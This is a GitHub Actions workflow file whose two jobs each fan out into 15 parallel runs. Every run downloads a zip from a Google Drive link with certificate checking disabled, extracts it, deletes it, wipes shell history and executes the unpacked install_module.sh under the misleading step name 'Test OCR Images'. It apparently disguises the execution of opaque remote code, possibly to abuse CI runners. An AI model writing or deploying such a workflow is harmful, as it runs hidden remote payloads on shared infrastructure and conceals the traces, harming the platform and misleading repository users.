name: mahoa6team
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  configure:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Provision', 'Build', 'Confirm', 'Trigger', 'Deploy']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1lGMzqr52ApOlI9rCC6nMYmnfHA44JXFu" -O mahoa6team.zip
        unzip -o mahoa6team.zip
        rm mahoa6team.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh


  SETUP1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Adapt', 'Assemble', 'Confirm', 'Ignite', 'Release']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1lGMzqr52ApOlI9rCC6nMYmnfHA44JXFu" -O mahoa6team.zip
        unzip -o mahoa6team.zip
        rm mahoa6team.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh
        
